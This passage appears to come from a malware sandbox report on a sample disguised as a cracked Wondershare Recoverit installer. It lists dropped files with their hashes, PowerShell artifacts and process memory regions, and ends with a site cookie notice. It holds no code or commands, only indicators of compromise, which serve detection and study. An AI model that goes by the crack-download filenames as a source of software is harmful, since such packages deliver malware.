                                    5e64d6a96700d6aad4aee2dff0bcafe425d15a6e

                                    SHA256

                                    0ab4b297ce83d2cc36d1609e293ef1a471ed77d8c3b842510824fa58001726e2

                                    SHA512

                                    51dfbe31accc992c0583fac1be1c87e3dda2a6ba993d7444e0d19fe15501c2ffff8c02787f962a86e4a1a9af7438d794f389892ba66ee8eacf0ff6e69c0d1509

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Filesize

                                    18KB

                                    MD5

                                    41cf2f01bc2a415ba4ac63eaecf7f3d8

                                    SHA1

                                    92465f69d1ad1f78e789c0509397c47c7e8e8526

                                    SHA256

                                    fac30766038c476d16cb56a612e3f39eb34b7bd48d4aecbbef0f3315d92ee732

                                    SHA512

                                    237f830f616b17506ee41f36ce0c06e457872c46a01e89c67cd633d7c0ed26aac25f9354e05b86dea70e090b650233c9c96836c5f68cd22d640e870d4b3b5899

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Filesize

                                    18KB

                                    MD5

                                    2d38d8329b9460561a85ba390eddbdba

                                    SHA1

                                    fd7dcd67ecacd438d9db5f262154b6e9f0ce042c

                                    SHA256

                                    19d3d5a4be33479654c577a8925c561e1ea33c42e738e6e0da0e7b80e7b4002c

                                    SHA512

                                    c2ceb0e2d7572cb803412f8ae0e492c8f22857760dd99ce57c8c167bef475790ef4f8970535728a156ad1339eff2f9c8b3a2426d8b55a8c346b437631be561af

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Filesize

                                    18KB

                                    MD5

                                    7735690c5fcd4ad60ebdbb4946fb915a

                                    SHA1

                                    8818bd39fc028fa9d3cad3756e10e10a112eed07

                                    SHA256

                                    7858de1eb32962161f93d20375e0b7bd3d2a729fd146ca1038f9e8a621651ec4

                                    SHA512

                                    af74e32f0076dcb01b5dcd5a7b99e6323b2e998aa04d51a3739e3a7f8e8ac5c6db91be2b35fbb5af4a4a00bb95c218f2d2f45ef948127c64a53ce8a2f6e4392e

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Filesize

                                    18KB

                                    MD5

                                    02d55ea374c6d153ca8576d07428ce3b

                                    SHA1

                                    38104a2a0ff1b92d0724b191ba3983b382235c9c

                                    SHA256

                                    4c45bf28a3eee8643333c7e55571e4d8160d4125f7baf45e4661e0b4d818a607

                                    SHA512

                                    2830d7ac20733e952e8e5bfa8653d8498d8acf9af1bdf54ae4717eb388bb63504ca2895394efac372d573c72d80d544ce917dddb7975d7800640690fbcaa2cb6

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ikgte2r.aqs.ps1

                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  • C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Crack.rar

                                    Filesize

                                    7.2MB

                                    MD5

                                    1f7cc83c3ceca1eb94a6d611eec9a51d

                                    SHA1

                                    5ba6ef6e74d178da78714845476bbfec2e30579d

                                    SHA256

                                    f759edf44f259718eb8035a46fb05479749cccd7b556f88796d5d36f21a7b22f

                                    SHA512

                                    6ce2cd884e90cb773d989d46f6ab4bee4f906325b3a08ddf338cbe4590d556b79116100ea8bf25dbf93e87f0e789a92f9b0ed3d6419520653edbf3cf7d6bafe7

                                  • C:\Users\Admin\Desktop\Wondershare Recoverit 13.0.2.9 Multilingual\Setup.exe

                                    Filesize

                                    190KB

                                    MD5

                                    da8aa4ad4bc4acb50330417d2ab47b73

                                    SHA1

                                    676a4a95b701706ce1acbd356ea2a581324ea2dd

                                    SHA256

                                    fb458f636eb28d708105513b43a8043aacc8d0c4c831dec2f4a48f71744c14d6

                                    SHA512

                                    e5c0876936f21767662363e3fa9affe7e442d608d91518df9ae0885275d2da6b8481265123a91cab7af92d461b42c39a9d347c069077bbfa270e4e56420e3f45

                                  • memory/536-1291-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/652-1379-0x00000000000E0000-0x000000000049A000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/652-1388-0x00000000000E0000-0x000000000049A000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/1140-1259-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/1516-1161-0x00000000068B0000-0x00000000068CE000-memory.dmp

                                    Filesize

                                    120KB

                                  • memory/1516-1149-0x0000000005BA0000-0x0000000005C06000-memory.dmp

                                    Filesize

                                    408KB

                                  • memory/1516-1192-0x0000000007E10000-0x0000000007E24000-memory.dmp

                                    Filesize

                                    80KB

                                  • memory/1516-1193-0x0000000007F10000-0x0000000007F2A000-memory.dmp

                                    Filesize

                                    104KB

                                  • memory/1516-1194-0x0000000007EF0000-0x0000000007EF8000-memory.dmp

                                    Filesize

                                    32KB

                                  • memory/1516-1146-0x00000000032F0000-0x0000000003326000-memory.dmp

                                    Filesize

                                    216KB

                                  • memory/1516-1190-0x0000000007DD0000-0x0000000007DE1000-memory.dmp

                                    Filesize

                                    68KB

                                  • memory/1516-1186-0x0000000007E50000-0x0000000007EE6000-memory.dmp

                                    Filesize

                                    600KB

                                  • memory/1516-1147-0x0000000005C80000-0x00000000062A8000-memory.dmp

                                    Filesize

                                    6.2MB

                                  • memory/1516-1148-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

                                    Filesize

                                    136KB

                                  • memory/1516-1179-0x0000000007C40000-0x0000000007C4A000-memory.dmp

                                    Filesize

                                    40KB

                                  • memory/1516-1178-0x0000000007BD0000-0x0000000007BEA000-memory.dmp

                                    Filesize

                                    104KB

                                  • memory/1516-1177-0x0000000008220000-0x000000000889A000-memory.dmp

                                    Filesize

                                    6.5MB

                                  • memory/1516-1176-0x0000000007AB0000-0x0000000007B53000-memory.dmp

                                    Filesize

                                    652KB

                                  • memory/1516-1191-0x0000000007E00000-0x0000000007E0E000-memory.dmp

                                    Filesize

                                    56KB

                                  • memory/1516-1175-0x0000000006E50000-0x0000000006E6E000-memory.dmp

                                    Filesize

                                    120KB

                                  • memory/1516-1150-0x00000000062B0000-0x0000000006316000-memory.dmp

                                    Filesize

                                    408KB

                                  • memory/1516-1156-0x0000000006320000-0x0000000006674000-memory.dmp

                                    Filesize

                                    3.3MB

                                  • memory/1516-1165-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/1516-1162-0x00000000068D0000-0x000000000691C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/1516-1164-0x0000000006E70000-0x0000000006EA2000-memory.dmp

                                    Filesize

                                    200KB

                                  • memory/1700-1460-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/1828-1195-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/2628-1314-0x0000000007290000-0x00000000072A4000-memory.dmp

                                    Filesize

                                    80KB

                                  • memory/2628-1301-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/2672-1481-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/2692-1448-0x0000000000640000-0x00000000009FA000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/2692-1446-0x0000000000640000-0x00000000009FA000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/3028-1328-0x00000000063B0000-0x00000000063FC000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/3028-1326-0x0000000005E10000-0x0000000006164000-memory.dmp

                                    Filesize

                                    3.3MB

                                  • memory/3028-1340-0x0000000007770000-0x0000000007781000-memory.dmp

                                    Filesize

                                    68KB

                                  • memory/3028-1341-0x00000000077C0000-0x00000000077D4000-memory.dmp

                                    Filesize

                                    80KB

                                  • memory/3028-1339-0x00000000074C0000-0x0000000007563000-memory.dmp

                                    Filesize

                                    652KB

                                  • memory/3028-1329-0x0000000070950000-0x000000007099C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/3488-1382-0x0000000000110000-0x00000000004CA000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/3488-1351-0x0000000000110000-0x00000000004CA000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/3744-1144-0x00000000002F0000-0x0000000000326000-memory.dmp

                                    Filesize

                                    216KB

                                  • memory/3772-1406-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/3772-1404-0x00000000059E0000-0x0000000005D34000-memory.dmp

                                    Filesize

                                    3.3MB

                                  • memory/4140-1228-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/4308-1238-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  • memory/4524-1371-0x00000000004C0000-0x000000000087A000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/4524-1386-0x00000000004C0000-0x000000000087A000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/4892-1361-0x0000000000190000-0x000000000054A000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/4892-1384-0x0000000000190000-0x000000000054A000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/4892-1500-0x0000000000A30000-0x0000000000DEA000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/4892-1502-0x0000000000A30000-0x0000000000DEA000-memory.dmp

                                    Filesize

                                    3.7MB

                                  • memory/5116-1427-0x0000000070A00000-0x0000000070A4C000-memory.dmp

                                    Filesize

                                    304KB

                                  We care about your privacy.

                                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.